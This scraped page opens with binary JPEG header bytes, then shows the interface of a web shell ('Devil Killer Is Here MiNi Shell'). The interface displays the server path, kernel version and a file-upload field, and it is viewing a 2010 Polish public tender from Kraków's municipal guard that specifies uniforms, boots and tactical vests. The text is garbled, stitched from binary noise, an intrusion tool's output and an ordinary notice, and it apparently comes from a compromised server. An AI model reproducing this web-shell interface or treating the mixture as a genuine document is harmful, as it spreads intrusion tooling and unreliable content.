JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100225/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100225/39899-N-2010.html

<p class="kh_header"><b>Kraków: Dostawa elementów umundurowania</b><br>
<b>Numer ogłoszenia: 39899 - 2010; data zamieszczenia: 25.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska Miasta Krakowa , ul. Dobrego Pasterza 116, 31-416 Kraków, woj. małopolskie, tel. 012 4137703, 4133734, faks 012 4138829.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.krakow.pl/?bip_id=33&mmi=11723</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elementów umundurowania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa elementów umundurowania wykonanych wg wzoru    określonego w Rozporządzeniu Rady Ministrów z dnia 28.07.1998 r. w sprawie umundurowania  strażników gminnych i miejskich (Dz. U. z 1998 r., Nr 112 poz. 713 z późn. zmianami) oraz zgodnych  ze wzorami umundurowania  używanymi przez Straż Miejską Miasta Krakowa.

  Część 1 - kurtka olimpijka                                     - 101 szt.
                    Oznaczenie przedmiotu zamówienia wg CPV 18.22.32.00-8
Kurtka olimpijka - materiał gabardyna o gramaturze 480 gr/mb ( przy szer. tkaniny142 cm), kolor ciemny granat, na podszewce, na plecach dwie fałdy, szerokie szlufki na pas, ściągacze gumowe po bokach, zapina-nie na guziki kryte listwą, dwie kieszenie z mieszkiem  zamykane klapkami, na lewej kieszeni 7,5 cm poniżej guzika metalowego przyszyty mały ,czarny guzik (podtrzymujący identyfikator),  na pagonach oraz przy kieszeniach i rękawach - małe guziki metalowe koloru złotego z wizerunkiem orła.
      Termin dostawy: do 29 kwietnia 2010 r.

               - spodnie tropik                                          - 263 szt.
                Oznaczenie przedmiotu zamówienia wg CPV 18.23.40.00-8
Spodnie: krój prosty z lampasem koloru żółtego, z przodu dwie kieszenie w karczkach biodrowych, z tyłu jedna kieszonka z wypustką na guzik, podwójne szlufki na pasek i pas główny, zapięcie specjalne regulujące obwód pasa, rozporek zapinany na guziki kryty plisą, materiał - elana 55%, wełna 45%, gramatura 360 gr/mb (przy szer. tkaniny 142 cm), kolor ciemny granat
     Termin dostawy: do 29 kwietnia 2010 r. 
                                  
               -  spodnie gabardynowe                             - 173 szt.
Oznaczenie przedmiotu zamówienia wg CPV 18.23.40.00-8
Spodnie gabardynowe: krój prosty z lampasem koloru żółtego, z przodu dwie kieszenie w karczkach biodro-wych, z tyłu jedna kieszonka z wypustką na guzik, podwójne szlufki na pasek i pas główny, zapięcie specjalne regulujące obwód pasa, rozporek zapinany na guziki kryty plisą, materiał - gabardyna mundurowa 480 gr/mb ( przy szer. tkaniny142 cm), kolor - ciemny granat.	
     Termin dostawy: od 1  do 15 października 2010 r. 

            
              - marynarka dwurzędowa                          -   5 szt.
Marynarka: materiał - elanowełna o gramaturze od 450 do 480g/mb (przy szerokości tkaniny 142 cm), 45% wełny 55%elany (? 1%), rodzaj splotu - gabardyna, kolor identyczny z kolorem spodni, zapinana na guziki metalowe w kolorze złotym ze stylizowanym wizerunkiem orła,  kieszeń wewnętrzna, dwie kieszenie zewnętrzne wpuszczane z patką, naramienniki zapinane na guziki metalowe w kolorze złotym ze stylizowanym wizerunkiem orła.
      Termin dostawy: do 29 kwietnia 2010 r.

Część 2 - mundur polowy                                         -  36 kpl
                        Oznaczenie przedmiotu zamówienia wg CPV 35.81.20.00-9
Typowa kurtka policyjno - wojskowa zapinana na guziki kryte plisą, materiał w kolorze b. ciemny granat,       4 kieszenie zewnętrzne  z przodu,  zapinane na guziki kryte plisą, pagony na ramionach zapinane na guziki, oznakowanie: napis STRAŻ MIEJSKA -minimalna wys. liter -25 mm z przodu i 50 mm z tyłu, litery w kolorze srebrnym na żółtym odblaskowym tle, patka na blachę na lewej  kieszeni.
Spodnie - materiał w kolorze b. ciemny granat, na szelkach, 6 kieszeni ( 2 z przodu, wpuszczane w karczek biodrowy, 4 kieszenie naszywane, zapinane na guziki  kryte plisą, umieszczone na udach z przodu i z tyłu, po dwie na każdej z  nogawek), ściągacz gumowy na nogawkach, wzmocnione w kroku, rozporek zapinany na zamek błyskawiczny kryty plisą.
Materia typu FOREMAN: 67% poliester, 33% bawełna, gramatura min. 252g/m2.
              
              - spodnie do munduru polowego              -  26 szt.
Spodnie - materiał w kolorze b. ciemny granat, na szelkach, 6 kieszeni ( 2 z przodu, wpuszczane w karczek biodrowy, 4 kieszenie naszywane, zapinane na guziki  kryte plisą, umieszczone na udach z przodu i z tyłu, po dwie na każdej z  nogawek), ściągacz gumowy na nogawkach, wzmocnione w kroku, rozporek zapinany na zamek błyskawiczny kryty plisą.
Materiał typu FOREMAN: 67% poliester, 33% bawełna, gramatura  min. 252g/m2.
      
                 - oznakowanie do munduru polowego    - 300 kpl     
Oznakowanie: napis STRAŻ MIEJSKA -minimalna wys. liter -25 mm z przodu i 50 mm z tyłu, litery w kolorze srebrnym na żółtym odblaskowym tle-  takie jak na mundurze polowym  ( opis jak wyżej). 
    Termin dostawy: do 29 kwietnia 2010 r.

Część 3 -  koszula służbowa (niebieska, dł. rękaw)    - 323 szt.
                       Oznaczenie przedmiotu zamówienia wg CPV 18.33.20.00-5
Koszula - materiał 55% bawełna, 45% poliester, zapięcie wykończone imitacją plisy,  jedna kieszeń nie zapinana. Kolor niebieski.
              - koszula letnia (niebieska, kr. rękaw)        - 344 szt.
Koszula - materiał 55% bawełna, 45% poliester, dwie kieszenie z mieszkiem i klapką zapinaną na guzik, patka na blachę, zapięcie wykończone imitacją plisy, na ramionach pagony. Kolor niebieski.
               
              -  koszula letnia ( biała, kr. rękaw)             -  35 szt.
Koszula - materiał 55% bawełna, 45% poliester, dwie kieszenie z mieszkiem i klapką zapinaną na guzik, patka na blachę, zapięcie wykończone imitacją plisy, na ramionach pagony. Kolor biały.
           
              -  koszula służbowa (biała, dł. rękaw)        -  22 szt.
Koszula - materiał 55% bawełna, 45% poliester, zapięcie wykończone imitacją plisy, jedna kieszeń nie zapinana. Kolor biały.
     Termin dostawy: do 29 kwietnia 2010 r. 

Część 4 - kurtka zimowa krótka                          -  65 szt.
Oznaczenie przedmiotu zamówienia wg CPV 18.22.32.00-8
Kurtka zimowa krótka: materiał - 100% poliester powlekany poliuretanem, gramatura min.155gr/m2,  kolor ciemny granat, długość do połowy bioder, wyposażona  w  2 nakładane kieszenie wierzchnie dostępne  z góry i z boku, kieszeń wewnętrzna  na podszewce, całość zapinana na zamek błyskawiczny kryty plisą, dół kurtki i rękawy wykończone gumą (ściągacze), szlufki na pas główny, pagony na rzepy lub guziki,  klapa na bla-chę służbową, odpinany kołnierz  futrzany, odpinana pikowana podpinka.
  
                 -  kurtka zimowa ?                                  -  48 szt.
Oznaczenie przedmiotu zamówienia wg CPV 18.22.32.00-8
Kurtka zimowa 3/4: ocieplona, materiał - 100% poliester powlekany poliuretanem, gramatura min.          155 gr/m2,  kolor ciemny granat,, wyposażona w 2 kieszenie wierzchnie, jedną wewnętrzną, całość zapinana na zamek błyskawiczny kryty plisą, w dolnej części po bokach gumki, ściągacz na rękawach, pagony na rzepy lub guziki,  klapa na blachę służbową, od wewnątrz kurtki dopinana stójka (kołnierz krótki).
       Termin dostawy: od 1 do 15 października 2010 r.

  Część 5 - odzież treningowa (dres z nadrukiem SM)  - 107 kpl  
                     Oznaczenie przedmiotu zamówienia wg CPV 18.41.21.00-1
Dres - materiał :  bawełna 70% + poliester 30% , gramatura min. 280 g/m2, kolor ciemny  granat, bluza na zamek z napisem na plecach w kolorze żółtym STRAŻ MIEJSKA (wys. liter - 2,5 cm), spodnie z zewnętrznym rozcięciem ( 8,5 cm) na dole nogawek.
      Termin dostawy:  do 14 maja 2010 r. 

  Część 6 -  sweter służbowy                                    - 164 szt.
                     Oznaczenie przedmiotu zamówienia wg CPV 18.23.53.00-8
Sweter służbowy typ SM  w serek, kolor - ciemny granat, skład: 40% wełna, 55% akryl,     5% lycry, obszy-cia z elanobawełny w kolorze swetra, wzmocnienia na ramionach i rękawach, na lewej piersi kieszeń z patką zapinana na rzep, pagony na rzep, rękaw  zakończony odwijanym mankietem, dół swetra wykończony  po-dwójnym ściągaczem.
               
               -  szalik zimowy                                     - 153 szt.
                     Oznaczenie przedmiotu zamówienia wg CPV 18.42.20.00-3
Szalik zimowy koloru ciemny granat o wymiarach 100-110 cm x 26-30 cm o składzie: 70% akryl, 30% wełna.                               
     Termin dostawy: od 1 do 15 października 2010 r. 
  
 Część 7 -  golf bawełniany                                    - 607 szt.
                     Oznaczenie przedmiotu zamówienia wg CPV 18.33.10.00-8
Golf w kolorze ciemny granat, materiał - 100% bawełna, gramatura 180 g/m2,  dół i rękawy wykończone ściągaczami z domieszką lycry .	                                

                - koszulka T-shirt (z nadrukiem SM)             -1214 szt.   
                      Oznaczenie przedmiotu zamówienia wg CPV 18.33.00.00-8
 Koszulka bawełniana (100% bawełna) gramatura - 180 gr/m2,  kolor ciemny granat z nadrukiem w kolorze żółtym STRAŻ MIEJSKA  na plecach ( wys. liter- 2,5 cm) i lewej piersi ( wys. liter - 1 cm).    
      Termin dostawy: do 29 kwietnia 2010 r.

  Część 8 -  krawat służbowy - bezpieczny            - 288 szt.
                  Oznaczenie przedmiotu zamówienia wg CPV 18.42.30.00-0
      Krawat żakardowy gładki w kolorze ciemny granat, typ bezpieczny  ( zapinany na rzep), szerokość w dolnej części - 9,5 cm.
    Termin dostawy: do 29 kwietnia 2010 r.

  Część 9 - skarpety męskie                                    - 730 par
                  Oznaczenie przedmiotu zamówienia wg CPV 18.31.70.00-4
      Skarpety męskie niekurczliwe w kolorze ciemny granat, bawełna 100%  z komfortowym ściągaczem i płaskim szwem.

               - skarpety zimowe męskie                      - 630 par
      Skarpety męskie frotte  w kolorze: ciemny granat, materiał:  bawełna 80% + poliamid 20%  ze ściągaczem i płaskim  szwem.
     Termin dostawy: do 29 kwietnia 2010 r.

  Część 10  -  czapki   Oznaczenie przedmiotu zamówienia wg CPV 18.42.33.20-5
                  -  czapka garnizonowa                         -  82 szt.(69- zwykłe, 10 - 1 galon, 3- 2 galony)
Czapka garnizonowa - materiał gabardyna w kolorze ciemny granat, otok w kolorze żółto - granatowym, orzełek metalowy ze wstęgą i napisem  STRAŻ MIEJSKA  w kolorze żółtym, daszek lakierowany na czarno, nad daszkiem czarny pasek skórzany przypięty do otoku dwoma małymi guzikami metalowymi z wizerunkiem orła w kolorze żółtym. 


             -  czapka letnia                                      -  81 szt.  
Czapka letnia typ (baseball) w kolorze ciemny granat z otokiem żółto - granatowym oraz z  wyhaftowanym mechanicznie emblematem orła ze wstęgą  i napisem STRAŻ MIEJSKA  w kolorze żółtym, posiadająca miękki potnik i regulację z tyłu.
                  - czapka zimowa			           -  46 szt.
                           Oznaczenie przedmiotu zamówienia wg CPV 18.44.33.20-5
	Czapka zimowa z daszkiem w kolorze ciemny granat z orłem metalowym koloru żółtego i otokiem żółto - granatowym, wykonana z nylonu, ocieplona pikowaną ociepliną, nauszniki z futerkiem koloru czarnego wiązane na szczycie czapki.

                     -  czapka typ dokerka                       - 308 szt.
Czapka typ dokerka  - materiał 100% bawełna w kolorze ciemny granat, z  wyhaftowanym mechanicznie emblematem orła ze wstęgą  i napisem Straż Miejska w kolorze żółtym, na środku otoczki czapki. 
     Termin dostawy: do 29 kwietnia 2010 r.

 Część 11  - kalesony                                               - 184 szt.
                     Oznaczenie przedmiotu zamówienia wg CPV 18.31.20.00-9
Kalesony ocieplone - materiał 100% bawełna z kutnerkiem, gram. 200 gr/m2, kolor jasnopopielaty ( melanż).
     
                 - podkoszulek zimowy                           - 186 szt.
                      Oznaczenie przedmiotu zamówienia wg CPV 18.31.84.00-5
Podkoszulek zimowy- materiał 100% bawełna z kutnerkiem, gram. 200 gr/m2 kolor jasnopopielaty (melanż).
     Termin dostawy: od 1 do 15 października 2010 r. 

  Część 12 - buty zimowe męskie ( za kostkę)       - 121 par   
                      Oznaczenie przedmiotu zamówienia wg CPV 18.81.51.00-6
Wierzch: cholewka typu derbowego wykonana ze skór bydlęcych gładkich gr. 1,4 - 1,6; podszewka na obłożyny: tkanina ocieplana typu kożuch krótki włos; międzypodszewka typu molino; podeszwa typu LUGA koloru czarnego; podsuwka wykonana ze styrogumu gr. 5 - 7 mm; wyściółka obuwnicza typu filc koloru czarnego;  kołnierz (tkanina skóropodobna typu skaj) z wypełnieniem pianką PU gr. 20 mm; system sznurowania: 4 uchwyty 210 + 3 uchwyty rurowe + 1 oczko (zakończenie); sznurowadła bawełniane kolor czarny dł. 1,4 - 1,6 m.
                - buty zimowe damskie ( za kostkę)      -  24 pary   
                      Oznaczenie przedmiotu zamówienia wg CPV 18.81.51.00-6
Wierzch: cholewka typu derbowego wykonana ze skór bydlęcych gładkich gr. 1,4 - 1,6; podszewka na obłożyny: tkanina ocieplana typu kożuch krótki włos; międzypodszewka typu molino; podeszwa typu LUGA koloru  czarnego; podsuwka wykonana ze styrogumu gr. 5 - 7 mm; wyściółka obuwnicza typu filc koloru czarnego;  kołnierz (tkanina skóropodobna typu skaj) z wypełnieniem pianką PU gr. 20 mm; system sznurowania: 4 uchwyty 210 + 3 uchwyty rurowe + 1 oczko (zakończenie); sznurowadła bawełniane kolor czarny  dł. 1,4 - 1,6 m.
      Termin dostawy: od 1 do 15 października 2010 r. 
 
 Część 13 -  półbuty męskie                                   - 240 par
                  Oznaczenie przedmiotu zamówienia wg CPV 18.81.50.00-5
     Półbuty męskie skórzane koloru czarnego, z  podszewką skórzaną, spód TR klejony, cholewka  gładka bez      przeszyć
                   -  półbuty damskie                                 -  60 par
     Półbuty damskie skórzane koloru czarnego, z  podszewką skórzaną, spód TR klejony, cholewka  gładka bez przeszyć
    Termin dostawy: do 29 kwietnia 2010 r.

 Część 14 - trzewiki specjalne całoroczne            -  82 pary
               Oznaczenie przedmiotu zamówienia wg CPV 18.81.52.00-7
Cholewka wykonana ze skóry naturalnej - bukat bydlęcy wodoodporny, skóra licowa, dwoina 1,8-2,0 mm  w kolorze czarnym, o wysokości min 20 cm od obcasa w wzwyż, sznurowana na uchwyty obuwnicze(system  szybkiego sznurowania) po osiem z każdej strony, sznurowadła czarne, okrągłe. Język miechowy i kołnierz 
wykonany ze skóry świńskiej, zmiękczonej pianką PU. Kołnierz o wys. 6 cm,  wypełniony pianką lateksową  przeszyty dwukrotnie pojedynczym szwem. Cholewka typu derbowego, w miejscu szycia rygli wzmocniona  nitami. Podnosek utwardzony z materiału termoplastycznego. Podszewka ze skóry naturalnej 0,9-1,1 mm. 
 Podpodeszwa wykonana z materiału podpodeszwowego. Wkładka wymienna. Podeszwa czarna, gumowa,  trudnościeralna, olejoodporna i antypoślizgowa typu WIBRAM, łączona z cholewką metodą klejenia,  przyszywana oraz gwoździowana na czubkach i piętach.
      Termin dostawy: do 29 kwietnia 2010 r.

 Część 15 - rękawice skórzane męskie                 - 118 par
                  Oznaczenie przedmiotu zamówienia wg CPV 18.42.40.00-7
 Rękawice skórzane  męskie(wzór mundurowy) 5 -palcowe, zimowe wykonane ze skóry rękawicznej w kolorze czarnym, ocieplane wkładem z anilany, maszynowo szyte, w nadgarstku wszyta gumka.
     Termin dostawy: od 1 do 15 października 2010 r. 

Część 16 - wyroby rymarskie  Oznaczenie przedmiotu zamówienia wg CPV 18.91.00.00-1
                - pas główny - biała klamra                   -  60 szt.
 Pas główny wykonany ze skóry bydlęcej licowej przebarwionej na wskroś, koloru czarnego z zamkniętą mizdrą, o grubości 3,0 - 3,5 mm. Na pasie ozdobne wyszycie (oficerskie), wyszycie podszyte dwoiną bydlęcą welurową, całość szyta nicią poliestrową koloru czarnego. Szerokość pasa 45 mm. Brzegi zamalowane far-bą, błyszczącą, wykończeniową. Okucia pasa koloru białego ( sprzączka, knopiki, nity)

    -  pas wąski -  biała klamra                    -  50 szt.
Pasek wąski wykonany  ze skóry bydlęcej licowej, przebarwionej na wskroś, koloru czarnego z zamkniętą mizdrą, o grubości 2,5 - 3,0 mm. Pasek obszyty  nicią poliestrową koloru czarnego. Szerokość paska 30 mm. Brzegi paska zamalowane farbą, błyszczącą, wykończeniową. Okucia  paska koloru białego ( sprzączka, ni-ty).       
    -  saszetka na dokumenty                     - 102 szt.
Saszetka wykonana ze skóry świńskiej licowej, przebarwionej na wskroś, koloru czarnego, o grubości 1,4 - 1,6 mm. Okucia w kolorze czarny nikiel ( zatrzaski, nit), wymiary: 16 x 13x 5 cm, uchwyt na pas główny nitowany
Termin dostawy: do 29 kwietnia 2010 r. 

Część 17 - kamizelka taktyczna  + pas główny  -  30 kpl.
   Oznaczenie przedmiotu zamówienia wg CPV 35.81.21.00-0
Kamizelka w kolorze czarnym przeznaczona do przenoszenia oporządzenia przez funkcjonariusza. Wykonana z surowca o dużej wytrzymałości mechanicznej i łatwego w konserwacji. Konstrukcja kamizelki trzyczęściowa , składa się z paneli przednich i pleców, elementy paneli przednich z częścią plecową  łączone są za pomocą taśm o szerokości 25mm poprzez regulatory plastikowe pozwalające na regulację szerokości kamizelki. Panele przednie łączone zamkiem błyskawicznym kostkowym dwu maszynkowym krytym patką z  rzepem i trzema zatrzaskami. Na ramionach elementy kamizelki łączone  za pomocą szerokich patek naramiennych z rzepami pozwalającymi na regulację wysokości kamizelki. Z dołu paneli kamizelki wszyte rozpinane szlufki pozwalające dopiąć kamizelkę do pasa głównego. Panele przednie kamizelki wykonane z dwóch rodzajów  kordury : zewnętrzna strona - kordura 900 , wewnętrzna strona - kordura 400 , plecy wykonane z siatki o gramaturze 290, wszystkie elementy plastykowe (klamry, regulatory, szlufki itp.) - National Holding lub równorzędne, wszystkie elementy metalowe (zatrzaski) - Ykk. lub równorzędne, zamki błyskawiczne Alfa lub równorzędne.
 Na prawym panelu przednim mają się znajdować: 
1. kieszeń na radiotelefon , z możliwością przekształcenia jej w kieszonkę cargo za pomocą dopinanej 
    klapki,
2. kieszeń cargo zamykana na rzep ( na zewnątrz klapy rzep pod napis: STRAŻ MIEJSKA),
3. kieszeń cargo duża zamykana na rzep,
4. kieszeń na radiotelefon z dołączonym mikrofonem zewnętrznym , z możliwością przekształcenia jej w kieszonkę cargo za pomocą dopinanej klapki,
      5. futerał latarki osobistej zamykany na zatrzask z dodatkową końcówką gumową ułatwiająca  chwyt,
6. uchwyt tomfy umożliwiający przenoszenie pałki w pozycji pionowej nie krępujący ruchów w radiowozie,
    podczas marszu , schylania się,
7. wewnętrzna kieszeń zamykana na zamek błyskawiczny.
Na lewym panelu przednim mają się znajdować :
1. uchwyt latarki osobistej posiadający regulację objętości i  wysokości montażu,
2. uchwyt pod odznakę służbową,
3. futerał otwarty kajdanek zabezpieczony rzepem i zatrzaskiem z dodatkowymi elastycznymi przelotkami
    do przenoszenia kajdanek jednorazowych,
4. kieszeń cargo zamykana na rzep,
5. kieszeń cargo zamykana na rzep,
6. futerał na RMG zamykany na zatrzask z dodatkową końcówką gumową ułatwiająca chwyt, 
7. futerał na multitool-a zamykany na zatrzask z dodatkową końcówką gumową ułatwiająca chwyt,
8. futerał na dwie pary rękawiczek lateksowych zamykany na  rzep, 
9. zewnętrzna kieszeń zamykana na rzep. 
Na panelu tylnim ma się znajdować :   rzep umożliwiający mocowanie napisu (STRAŻ  MIEJSKA) 
Oznakowanie: minimalna wys. liter - 25 mm z przodu i 50 mm z tyłu, litery w kolorze srebrnym na żółtym odblaskowym tle.

Pas główny szerokości 50 mm w kolorze czarnym , wykonany w technologii trójwarstwowej, zewnętrzna część pasa wykonana z kordury, środkowa z materiału usztywniającego, wewnątrz obszyty rzepem uniemoż-liwiającym przemieszczaniu się oporządzenia. Regulowany na całej płaszczyźnie, zapinany na dwupunktową  klamrę z przesuwnym bezpiecznikiem  ( uniemożliwiającym przypadkowe rozpięcie pasa ) i cztery plastikowe szlufki .Wszystkie elementy plastikowe (klamry, regulatory, szlufki itp.) - National Molding , YKK  lub rów-norzędne
      Termin dostaw: do 29 kwietnia 2010 r.

 Część 18 -  kamizelka odblaskowa                    -  50 szt.
Kamizelka odblaskowa: kolor żółty fluorescencyjny, taśmy odblaskowe pryzmatyczne żółte,     naszywki  odblaskowe pryzmatyczne żółte z napisem srebrnym STRAŻ MIEJSKA, lamówka odblaskowa, certyfikat  CE zgodny z normą EN-471.	
      Termin dostawy: do 29 kwietnia 2010 r.

    Wykonawca winien udzielić pełnej (materiały i robocizna) gwarancji na wyroby objęte  przedmiotem zamówienia na okres min. 12 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ewentualne uzupełnienie w/w dostaw</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 18.22.32.00-8, 18.23.40.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie obowiazuje</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy o spełnieniu warunków określonych w art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy o spełnieniu warunków określonych w art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy o spełnieniu warunków określonych w art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy o spełnieniu warunków określonych w art.22 ust.1</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie wykonawcy o spełnieniu warunków określonych w art.22 ust.1</p>
</li></ul></li></ul>
